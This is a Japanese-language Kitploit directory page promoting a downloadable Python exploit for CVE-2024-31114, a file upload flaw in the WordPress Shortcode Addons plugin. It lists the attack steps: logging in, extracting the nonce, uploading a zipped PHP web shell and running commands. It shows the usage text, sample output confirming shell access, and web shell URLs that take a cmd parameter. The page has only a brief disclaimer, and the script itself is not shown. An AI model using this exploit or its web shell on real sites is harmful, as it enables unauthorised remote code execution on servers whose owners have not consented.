Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - 認証済み(管理者以上)任意のファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-31114
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - 認証済み(管理者以上)任意のファイルアップロード

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-31114 - WordPress Shortcode Addons RCE エクスプロイト

Shortcode Addons <= 3.2.5 – 認証済み(管理者以上)任意ファイルアップロード
CVE ID: CVE-2024-31114
CVSS スコア: 9.1 (クリティカル)


🛠️ 脆弱性の説明

WordPress 用プラグイン Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension は、バージョン 3.2.5 を含むそれ以前のすべてのバージョンにおいて、ファイルタイプのバリデーションが欠如しているため、任意のファイルアップロードに対して脆弱です。

この欠陥により、管理者権限以上のアクセス権を持つ認証済み攻撃者がサーバーに任意のファイルをアップロードできるようになり、リモートコード実行 (RCE) につながる可能性があります。


🚀 スクリプトの説明

この Python スクリプトは脆弱性の悪用を自動化します。以下の処理を実行します:

  1. SSL 検証の無効化
  2. 指定された認証情報でのログイン
  3. CSRF トークン (_wpnonce) の抽出
  4. PHP シェル (nxploit.php) の生成
  5. .zip として圧縮・アップロード
  6. アップロードの確認とシェルへのアクセス
  7. ターゲットサーバーでの whoami の実行

🧪 使用方法

root@kitploit:~
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password

📤 出力例

root@kitploit:~
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.

🐚 Web シェルの使用方法

ペイロードがアップロードされると、次の形式でシステムコマンドを実行できます:

root@kitploit:~
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command

🔹 例:

root@kitploit:~
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls

これにより、サーバー上のカレントディレクトリの内容が一覧表示されます。

⚠️ 免責事項

このツールは教育目的および許可されたテスト目的のみです。
作者はこのスクリプトの誤用や損害について一切の責任を負いません。

責任を持って使用し、明示的なテスト許可を得たシステムでのみ使用してください。


作成者: Nxploited | Khaled Alenazi

ツールをダウンロード